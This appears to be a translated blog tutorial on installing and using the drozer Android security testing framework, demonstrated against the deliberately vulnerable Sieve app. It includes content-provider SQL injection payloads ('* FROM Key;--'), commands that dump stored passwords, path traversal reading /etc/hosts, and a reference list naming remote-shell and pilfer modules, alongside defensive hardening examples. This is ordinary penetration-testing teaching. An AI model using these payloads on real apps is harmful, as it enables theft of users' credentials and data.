簡(jiǎn)介
drozer官網(wǎng)
drozer github
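drozer is a security testing framework for Android.
Installing drozer
There are two ways to install it:
1. Direct installation: download the prebuilt whl file from the official site and install it
2. Build from source: download the source code, then build and install it
Environment: to avoid installation problems, check the following items
Python 2.7 (three stars)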
Protobuf 2.6 or greater
Pyopenssl 16.2 or greater
Twisted 10.2 or greater
Java Development Kit 1.7 (three stars)
Android Debug Bridge
Direct installation
- Download the latest drozer.whl locally, then install it with Python's pip
sudo pip2 install drozer-2.4.4-py2-none-any.whl
Download Agent.apk and install it on the phone. Open the app, select Embedded Server and turn it on to set up the connection between the phone and the PC
Set up port forwarding; drozer uses port 31415
adb forward tcp:31415 tcp:31415
- Connect with drozer to check that it works
drozer console connect
The result looks like this:
$ > drozer console connect
Selecting 5ea648cc75e73af3 (Xiaomi Mi Note 3 8.1.0)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.4)
dz>
Direct installation Q & A
Q1
The warning is as follows:
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'. Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
A1
service_identity needs to be installed. Check whether your pip is version 2 or 3; drozer uses python2
pip install service_identity
Install location: /usr/local/lib/python2.7/site-packages. It depends on the following packages: attrs, pyOpenSSL >= 0.14 (0.12 and 0.13 may work but are not part of CI anymore), pyasn1, pyasn1-modules, ipaddress on Python 2.7. For details, see
Q2
The error is as follows
drozer Server requires Twisted to run.
Run 'pip install twisted' to fetch this dependency.
A2
Run pip2 install twisted as the message suggests
Re-run drozer console connect
to enter drozer mode
Build from source
Recommended reading
https://github.com/mwrlabs/drozer
https://github.com/mwrlabs/drozer/wiki/Running-on-the-edge
Installation method 1
- Download the source
git clone https://github.com/mwrlabs/drozer/
- Change to the downloaded drozer source directory
cd drozer
- Build
python2 setup.py build
- Install
python2 setup.py install
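Install location: /usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg
Using Java plugins afterwards
Java plugins live in drozer/src/drozer/modules/common; add Test.java there. To use it, build and install again; this does not affect the earlier installation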
python2 setup.py build
// The previous command can be skipped; install builds first
python2 setup.py install
After python2 setup.py build, three files are generated in addition to the original Test.java:
Test.java
Test$test.class
Test.class
Test.apk
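The end goal is to use Test.apk; put only the apk into the install location /usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/modules/common
You can also use the following command, which generates only the Test.apk file, and then drop that file into the install location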
make apks
Installation method 2
The method described on GitHub
git clone https://github.com/mwrlabs/drozer/
cd drozer
python2 setup.py bdist_wheel
cd dist
pip2 install drozer-2.4.3-py2-none-any.whl
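Install locations: /usr/local/lib/python2.7/site-packages/drozer and /usr/local/lib/python2.7/site-packages/drozer-2.4.3.dist-info
Using Java plugins afterwards
Java plugins live in drozer/src/drozer/modules/common; add Test.java there. You can repeat the commands above, but the existing install is not overwritten; you have to uninstall and then install again for the change to take effect. The first method is recommended because it is simpler
Using make apks generates only the apks, and loading the Java code will not succeed; the key point is that the apk that is finally used is produced from the class files. Alternatively, generate it as follows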
javac -cp lib/android.jar dextest.java
dx --dex --output=dextest.apk dextest*.class
Build from source Q&A
Q1
The error is as follows
/bin/sh: protoc: command not found?
A1
I found many suggested fixes online; in the end I installed it as follows
brew install grpc protobuf
Q2
The error is as follows:
UNEXPECTED TOP-LEVEL EXCEPTION:
com.android.dx.cf.iface.ParseException: bad class file magic (cafebabe) or version (0034.0000)
A2
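Analysis: a dx problem
Fix: edit the Makefile and point the DX variable at the dx bundled with the drozer source, DX = $(CURDIR)/src/drozer/lib/dx; set the other variables such as javac and NDKBUILD according to your own system
Result: no effect, because until then I had been installing everything with the make command, as shown below, and it kept failing and could not continue, for example with md5sum command no found or make: dpkg: No such file or directory and so on
// Install drozer's Python dependencies
$ easy_install --allow-hosts pypi.python.org protobuf==2.4.1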
$ easy_install twisted==10.2.0
git clone git://github.com/mwrlabs/drozer/
cd drozer
cp src/drozer/meta.py .
// Edit the Makefile and point the DX variable at the dx bundled with the drozer source
// DX = $(CURDIR)/src/drozer/lib/dx
// Set the other variables such as javac and NDKBUILD according to your own system.
make
python setup.py install
Analysis: searching online suggests that Java 7 must be specified
Fix 1: specify the Java runtime in the ~/.drozer.config file, paying attention to the format; in my own testing this did not work
[executables]
java = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/java
javac = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/javac
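Fix 2: configure the environment variables in .bash_profile; this worked
Usage
- Basic usage
- Module usage
  - python modules: custom test modules written in Python that extend the testing features of the drozer console
  - dex modules: Android code written in Java that extends the features of the drozer agent
Basic usage
Official documentation: installation and usage guide
Official test app sieve.apk
1. Find a package name by keyword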
dz> run app.package.list -f sieve
com.mwr.example.sieve
List all installed packages: run app.package.list
2. View package information
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Application Label: Sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/user/0/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-z3nWTMbV0D6n2Ak5bB1Hvg==/base.apk
UID: 11069
GID: [3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
3. Attack surface analysis
Check whether the four component types can be invoked by other applications
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
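The same attack-surface question can be answered from the developer's side by auditing the manifest before release. The following is an added example, not part of the original article or of drozer; the manifest, package name and component names are constructed, and the default-export rules in the comments are stated assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed manifest; package and component names are illustrative.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.audit">
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".AuthService" android:exported="true"/>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.audit.SYNC"/>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.audit.DBContentProvider"
              android:exported="true"/>
    <provider android:name=".InternalProvider"
              android:authorities="com.example.audit.internal"/>
  </application>
</manifest>
"""

KINDS = ("activity", "service", "receiver", "provider")

def is_exported(kind, elem):
    # An explicit android:exported value always wins.
    explicit = elem.get(A + "exported")
    if explicit is not None:
        return explicit == "true"
    if kind == "provider":
        return False  # assumption: targetSdkVersion >= 17
    # Assumption: other components default to exported only when they
    # declare an intent filter.
    return elem.find("intent-filter") is not None

def is_guarded(kind, elem):
    # True when a caller needs a permission to reach the component.
    if elem.get(A + "permission"):
        return True
    if kind == "provider":
        return bool(elem.get(A + "readPermission") and elem.get(A + "writePermission"))
    return False

def audit(manifest_xml):
    app = ET.fromstring(manifest_xml).find("application")
    exported = [(kind, elem.get(A + "name"), is_guarded(kind, elem))
                for kind in KINDS
                for elem in app.findall(kind)
                if is_exported(kind, elem)]
    return {"debuggable": app.get(A + "debuggable") == "true",
            "exported": exported}

def unprotected(report):
    # Exported components that any other app on the device can reach.
    return [(kind, name) for kind, name, guarded in report["exported"] if not guarded]

if __name__ == "__main__":
    print(unprotected(audit(SAMPLE_MANIFEST)))
```

Every entry returned by unprotected() corresponds to a "Permission: null" line in the drozer output and should either be unexported or given a permission.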
4. The four components: Activity
4.1 List the Activities that can be invoked
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
Permission: null
com.mwr.example.sieve.MainLoginActivity
Permission: null
com.mwr.example.sieve.PWList
Permission: null
4.2 Start an invokable Activity
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
More parameters
dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
Starts an Activity using the formulated intent.
Examples:
Start the Browser with an explicit intent:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags ACTIVITY_NEW_TASK
If no flags are specified, drozer will add the ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags 0x0
Starting the Browser with an implicit intent:
dz> run app.activity.start
--action android.intent.action.VIEW
--data-uri http://www.google.com
--flags ACTIVITY_NEW_TASK
For more information on how to formulate an Intent, type 'help intents'.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
--action ACTION specify the action to include in the Intent
--category CATEGORY [CATEGORY ...]
specify the category to include in the Intent
--component PACKAGE COMPONENT
specify the component name to include in the Intent
--data-uri DATA_URI specify a Uri to attach as data in the Intent
--extra TYPE KEY VALUE
add an field to the Intent's extras bundle
--flags FLAGS [FLAGS ...]
specify one-or-more flags to include in the Intent
--mimetype MIMETYPE specify the MIME type to send in the Intent
5. The four components: Content Provider
5.1 List the accessible Content Providers
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Analysis: there is an export risk. When there is no export risk, the output looks like the following
dz> run app.service.info -a com.xxxxx.sample
Package: com.xxxxx.sample
No exported services.
5.2 List the accessible Content Provider URIs (data leakage)
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider/
Unable to Query content://com.mwr.example.sieve.DBContentProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords/
Able to Query content://com.mwr.example.sieve.DBContentProvider/Keys/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
5.2 View the data behind a URI
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id 1
service 1qazxsw23edcvfr4
username 1qazxsw23edcvfr4
password xLy+YA+alamO1WSy2lMhYCnxL+sHYWh3jSAWMaMhQdU= (Base64-encoded)
email
5.3 SQL injection
5.3.1 Query: app.provider.query
help app.provider.query
5.3.1.1 List all tables in the database
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email ) |
| table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) | |
5.3.1.2 View the data in a single table
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password | pin |
| 1qazxsw23edcvfr4 | 9999 |
5.3.2 Insert: app.provider.insert
5.3.3 Update: app.provider.update
5.3.4 Delete: app.provider.delete
For the commands above, see the help command, e.g. help app.provider.insert
5.3.4 Download the database to the local machine: app.provider.download
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db .
5.3.5 Read low-level system files: app.provider.read
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
5.4 Check the security of the ContentProvider
5.4.1 Check for SQL injection
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.DBContentProvider
content://com.mwr.example.sieve.FileBackupProvider
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
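Why the --projection queries in 5.3.1 work, and what "Injection in Projection" means for the fix: the following is an added example, not code from the original article or from the Sieve app. It models the provider with Python's sqlite3, reuses the table layout printed in 5.3.1.1 with constructed rows, and assumes the provider joins the caller's projection straight into the SELECT statement; naive_query, safe_query and ALLOWED_COLUMNS are hypothetical names.

```python
import sqlite3

# Columns the provider is willing to expose; "password" is left out on purpose.
ALLOWED_COLUMNS = {"Passwords": {"_id", "service", "username", "email"}}

def make_db():
    # Schema as printed in 5.3.1.1; the rows are constructed sample data.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password BLOB, email);
        CREATE TABLE Key (Password TEXT PRIMARY KEY, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'mail', 'alice', x'00', 'a@example.test');
        INSERT INTO Key VALUES ('constructed-master-password', '0000');
    """)
    return db

def naive_query(db, table, projection, selection=None):
    # Vulnerable model: caller-controlled strings become part of the SQL text.
    sql = "SELECT %s FROM %s" % (", ".join(projection), table)
    if selection:
        sql += " WHERE " + selection
    return sql, db.execute(sql).fetchall()

def safe_query(db, table, projection, where_column=None, where_value=None):
    # Hardened model: identifiers come from an allowlist, values are bound.
    allowed = ALLOWED_COLUMNS.get(table)
    if allowed is None:
        raise ValueError("table not exposed: %r" % table)
    cols = list(projection) or sorted(allowed)
    for col in cols + ([where_column] if where_column else []):
        if col not in allowed:
            raise ValueError("column not allowed: %r" % col)
    sql = "SELECT %s FROM %s" % (", ".join(cols), table)
    params = ()
    if where_column:
        sql += " WHERE %s = ?" % where_column
        params = (where_value,)
    return sql, db.execute(sql, params).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The projection string from 5.3.1.2 rewrites the statement's FROM clause.
    print(naive_query(db, "Passwords", ["* FROM Key;--"]))
    print(safe_query(db, "Passwords", ["service", "username"]))
    try:
        safe_query(db, "Passwords", ["* FROM Key;--"])
    except ValueError as exc:
        print("rejected:", exc)
```

On Android the allowlist corresponds to giving the provider a fixed projection map and passing selection values as selectionArgs instead of concatenating them.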
5.4.2 Check for a file traversal vulnerability
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/Passwords/
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
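The FileBackupProvider findings above (and the /etc/hosts read in 5.3.5) come from treating the URI path as a filesystem path. The following added example, which is not from the original article or the Sieve app, contrasts that behaviour with a resolver confined to one directory; naive_resolve, safe_resolve and the directory layout are constructed for illustration.

```python
import os
import tempfile

def naive_resolve(uri_path):
    # Vulnerable model: the URI path is used directly as an absolute path.
    return os.path.normpath("/" + uri_path.lstrip("/"))

def safe_resolve(base_dir, uri_path):
    # Resolve symlinks and ".." first, then require the result to stay in base_dir.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes backup directory: %r" % uri_path)
    return candidate

def demo():
    # Constructed layout: <tmp>/backups/export.xml plus a symlink that points
    # out of the backup directory.
    with tempfile.TemporaryDirectory() as tmp:
        backups = os.path.join(tmp, "backups")
        os.mkdir(backups)
        open(os.path.join(backups, "export.xml"), "w").close()
        os.symlink(tmp, os.path.join(backups, "link"))
        base = os.path.realpath(backups)
        results = {}
        for path in ("export.xml", "/etc/hosts", "../secret.db",
                     "sub/../../secret.db", "link/secret.db"):
            try:
                results[path] = os.path.relpath(safe_resolve(backups, path), base)
            except PermissionError:
                results[path] = "DENIED"
        return results

if __name__ == "__main__":
    print(naive_resolve("/etc/hosts"))
    for path, outcome in demo().items():
        print(path, "->", outcome)
```

With the confined resolver, a request for /etc/hosts is reinterpreted as a path under the backup directory, where no such file exists, and every attempt to climb out is denied.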
6. The four components: Service
6.1 List the services that can be used
dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
Analysis: there is a risk. When nothing is exported, the message is No exported services.
6.2 Send a message to a service
dz> run app.service.send com.example.srv com.example.srv.Service --msg 1 2 3 --extra float value 0.1324 --extra string test value
Did not receive a reply from com.example.srv/com.example.srv.Service.
7. The four components: Broadcast
List the Broadcasts that can be used
dz> run app.broadcast.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
No matching receivers.
8. drozer command reference
app.activity.forintent Find activities that can handle the given intent
app.activity.info Gets information about exported activities.
app.activity.start Start an Activity
app.broadcast.info Get information about broadcast receivers
app.broadcast.send Send broadcast using an intent
app.broadcast.sniff Register a broadcast receiver that can sniff
particular intents
app.package.attacksurface Get attack surface of package
app.package.backup Lists packages that use the backup API (returns true
on FLAG_ALLOW_BACKUP)
app.package.debuggable Find debuggable packages
app.package.info Get information about installed packages
app.package.launchintent Get launch intent of package
app.package.list List Packages
app.package.manifest Get AndroidManifest.xml of package
app.package.native Find Native libraries embedded in the application.
app.package.shareduid Look for packages with shared UIDs
app.provider.columns List columns in content provider
app.provider.delete Delete from a content provider
app.provider.download Download a file from a content provider that supports
files
app.provider.finduri Find referenced content URIs in a package
app.provider.info Get information about exported content providers
app.provider.insert Insert into a Content Provider
app.provider.query Query a content provider
app.provider.read Read from a content provider that supports files
app.provider.update Update a record in a content provider
app.service.info Get information about exported services
app.service.send Send a Message to a service, and display the reply
app.service.start Start Service
app.service.stop Stop Service
auxiliary.webcontentresolver
Start a web service interface to content providers.
exploit.jdwp.check Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider
Reads APN content provider
exploit.pilfer.general.settingsprovider
Reads Settings content provider
information.datetime Print Date/Time
information.deviceinfo Get verbose device information
information.permissions Get a list of all permissions used by packages on the
device
intents.fuzzinozer fuzzinozer
scanner.activity.browsable Get all BROWSABLE activities that can be invoked from
the web browser
scanner.misc.checkjavascriptbridge
Check if addJavascriptInterface is used and can be
abused
scanner.misc.native Find native components included in packages
scanner.misc.readablefiles Find world-readable files in the given folder
scanner.misc.secretcodes Search for secret codes that can be used from the
dialer
scanner.misc.sflagbinaries Find suid/sgid binaries in the given folder (default
is /system).
scanner.misc.writablefiles Find world-writable files in the given folder
scanner.provider.finduris Search for content providers that can be queried from
our context.
scanner.provider.injection Test content providers for SQL injection
vulnerabilities.
scanner.provider.sqltables Find tables accessible through SQL injection
vulnerabilities.
scanner.provider.traversal Test content providers for basic directory traversal
vulnerabilities.
shell.exec Execute a single Linux command.
shell.send Send an ASH shell to a remote listener.
shell.start Enter into an interactive Linux shell.
simple.attack.activity Gets information about exported activities then start
them
tools.file.download Download a File
tools.file.md5sum Get md5 Checksum of file
tools.file.size Get size of file
tools.file.upload Upload a File
tools.setup.busybox Install Busybox.
tools.setup.minimalsu Prepare 'minimal-su' binary installation on the device.
Module usage
python modules
Workflow: create a module repository -> write the module -> install the module -> run the module
1. Create a module repository
- Method 1
Create a repositories folder to act as the repository from the drozer console
# !bash
dz> module repository create [/absolute_path/repositories]
- Method 2
Specify the repository in ~/.drozer_config
[repositories]
/absolute_path/repositories = /absolute_path/repositories
2. Write the module
Taking the official demo as an example, create the file GetInteger.py with the following code
#!python
from drozer.modules import Module

class GetInteger(Module):
    name = ""
    description = ""
    examples = ""
    author = "Joe Bloggs (@jbloggs)"
    date = "2012-12-21"
    license = "BSD (3-clause)"
    path = ["exp", "random"]

    def execute(self, arguments):
        random = self.new("java.util.Random")
        integer = random.nextInt()
        self.stdout.write("int: %d\n" % integer)
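Notes
name: the module's name
description: what the module does
examples: usage examples for the module
author: the author
date: the date
license: the license
path: the module's namespace
Here path = ["exp", "random"] and the class name is GetInteger, so the module is uniquely identified as exp.random.getinteger
3. Install the module
Method 1
Following Python package conventions, create a directory exp under the repositories directory, create an empty __init__.py file, then put the module (the GetInteger.py file above) into the exp directory
Method 2
Install with the module install command in the drozer console. Name the finished Python module source file getintegerbefore.getintegerafter, then run the following in the drozer console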
# !bash
dz> module install [/path/repositories]
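A getintegerbefore folder is generated in the repositories repository, containing two files, __init__.py and getintegerafter.py
Both absolute and relative paths work; absolute paths are recommended
- Install a remote module
Install a module provided on the mwr labs GitHub, for example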
#!bash
dz>module install jubax.javascript
3. Run the module
Run the module in the drozer console:
# !bash
dz> run exp.random.getinteger
int: 261603234
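- The module name does not depend on the file's location
- It is case-insensitive
- It depends only on the path declared in the file (e.g. path = ["exp", "random"]) and the class name (e.g. GetInteger), which together give exp.random.getinteger; it is still best to keep it consistent with the directory layout so that drozer does not exit with an error
When something goes wrong there is no error log at all; drozer simply exits. Good grief! One example is a duplicated path
If the file contains Chinese characters, save it as UTF-8 with BOM, otherwise drozer exits immediately
dex modules
Workflow: write the Java plugin code -> install the Java plugin -> write a Python module to verify it
1. Write the Java plugin code
For example, the following code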
import android.content.Intent;
import android.content.Context;
import java.io.Serializable;

public class IntentTest {
    public static class test implements Serializable {
    }

    public static boolean superfuzz_Activity(Context context, String package_params, String compoment_params) {
        Intent intent = new Intent();
        intent.setClassName(package_params, compoment_params);
        intent.putExtra("serializable_key", new test());
        // 0x10000000 is Intent.FLAG_ACTIVITY_NEW_TASK
        intent.setFlags(0x10000000);
        context.startActivity(intent);
        return true;
    }
}
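2. Install the plugin
Depending on how drozer was installed above, follow the matching "Using Java plugins afterwards" steps
3. Write a Python module to verify it
Write and install the Python module following the "python modules" steps above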
# !python
from drozer.modules import common, Module

class TestIntent(Module, common.ClassLoader):
    name = ""
    description = ""
    examples = ""
    author = ""
    date = ""
    license = ""
    path = ["exp", "test"]

    def execute(self, arguments):
        # The second argument is the Java class name inside the apk (IntentTest above)
        IntentTest = self.loadClass("common/IntentTest.apk", "IntentTest")
        IntentTest.superfuzz_Activity(self.getContext(), "com.xxx.xxx", "com.xxx.xxx.MainActivity")
Note: problems when starting the MainActivity class
- The android:exported="true" attribute must be set, otherwise:
Caused by: java.lang.SecurityException: Permission Denial: starting Intent
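- The activity must be declared in AndroidManifest.xml, and the package name and class name in the launch code must follow this format
Package name: com.xxx.xxx
Class name: com.xxx.xxx.MainActivity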
Intent intent = new Intent();
intent.setClassName("com.simple.hookapp", "com.simple.hookapp.MainActivity");
startActivity(intent);
Caused by: android.content.ActivityNotFoundException: Unable to find
explicit activity class {com.xxx.xxx/MainFragmentActivity};
have you declared this activity in your AndroidManifest.xml?
Run it in the drozer console to verify
#!bash
dz> run exp.test.testintent
Debugging
1. Run drozer in debug mode
drozer console connect --debug
2. After modifying the plugin, reload it
dz> reload
If reload does not take effect, use the following fix
Find the session file at /drozer/src/drozer/console/session.py and modify the code below
#!python
    # Uses sys.modules, so session.py needs "import sys" if it does not already have it
    def __module(self, key):
        """
        Gets a module instance, by identifier, and initialises it with the
        required session parameters.
        """
        module = None
        try:
            module = self.modules.get(self.__module_name(key))
        except KeyError:
            pass
        if module == None:
            try:
                module = self.modules.get(key)
            except KeyError:
                pass
        if module == None:
            raise KeyError(key)
        else:
            # reload module
            # Comment out the original line here and replace it with the code below
            mod = reload(sys.modules[module.__module__])
            module_class_name = module.__name__
            module_class = getattr(mod, module_class_name)  # get module class object
            return module_class(self)
Then rebuild and install drozer, or edit the file directly in the install location /usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/console/session.py
3. Run again
dz> run xx.xx.xx
Online scanning tools
From http://www.reibang.com/p/81bc16a7ac67
Tencent Kingkong audit system http://service.security.tencent.com/kingkong free, no restrictions
Tencent Yu Security http://yaq.qq.com/ free, viewing vulnerability details requires verification
Alibaba Jaq http://jaq.alibaba.com/ free, viewing vulnerability details requires verification
360 Microscope http://appscan.#/ free, no restrictions
360 APP vulnerability scan http://dev.#/html/vulscan/scanning.html free, no restrictions
Baidu MTC http://mtc.baidu.com 9.9 yuan per scan, no restrictions
Bangcle https://dev.bangcle.com free, no restrictions
Ineice http://www.ineice.com/ free, no restrictions
Tongfudun http://www.appfortify.cn/ free, no restrictions
NAGA http://www.nagain.com/appscan/ free, no restrictions
GES audit system http://01hackcode.com/ free, no restrictions
Janus, by Pangu http://appscan.io
Janus http://cloud.appscan.io
App reverse engineering main_classify_list https://android.fallible.co/
Java decompiler online http://www.javadecompilers.com
Tencent PC Manager: Habo http://habo.qq.com/
Tencent TSRC: Kingkong http://service.security.tencent.com/
Alibaba Jaq: http://jaq.alibaba.com/
Xi'an Jiaotong University sanddroid: http://sanddroid.xjtu.edu.cn/#home
Kingsoft Fire Eye: http://fireeye.ijinshan.com/analyse.html
Hanhaiyuan File B-Scan: https://b-chao.com
References
Thanks to the authors of the following articles
https://testerhome.com/topics/2209/show_wechat
https://juejin.im/post/5aa1191c6fb9a028d936be30
http://ju.outofmemory.cn/entry/170782
http://www.lynnshare.cc/article/?id=36
http://blog.0kami.cn/2016/08/20/old-how-to-install-drozer-on-mac/